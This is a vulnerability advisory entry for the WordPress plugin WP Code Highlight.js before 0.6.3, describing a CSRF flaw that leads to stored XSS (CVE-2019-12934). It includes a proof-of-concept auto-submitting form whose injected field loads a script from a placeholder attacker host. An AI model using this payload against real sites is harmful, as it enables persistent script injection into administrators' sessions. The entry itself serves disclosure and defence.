Lucene search
WpvulndbWPEX-ID:5AD84192-2853-4A63-B49A-B4B55B13D09EHistoryJul 17, 2019 - 12:00 a.m.
WP Code Highlight.js < 0.6.3 - CSRF to Stored XSS
2019-07-1700:00:00
wpvulndb
51
0.008 Low
EPSS
Percentile
82.2%
Lack of CSRF checks could allow attackers to make a logged in admin create XSS payloads.
<form id="hljs" name="hljs" method="post" action="https://example.com/wp-admin/options-general.php?page=wp-code-highlight-js">
<input type="hidden" name="hljs_location" value="local">
<input type="hidden" name="hljs_package" value="common">
<input type="hidden" name="hljs_theme" value="default">
<input type="hidden" name="hljs_additional_css" value="</style><script src="https://attacker.com/poc.js"></script>">
<input type="hidden" name="cmd" value="hljs_save">
<input type="submit" value="Submit">
</form>
<script>
document.getElementById('hljs').submit();
</script>Related
cve
cve
CVE-2019-12934
2019-07-20 00:15:11
nvd
nvd
CVE-2019-12934
2019-07-20 00:15:11
osv
osv
CVE-2019-12934
2019-07-20 00:15:11
wpvulndb
wpvulndb
WP Code Highlight.js < 0.6.3 - CSRF to Stored XSS
2019-07-17 00:00:00
prion
prion
Cross site request forgery (csrf)
2019-07-20 00:15:00
cvelist
cvelist
CVE-2019-12934
2019-07-19 23:47:55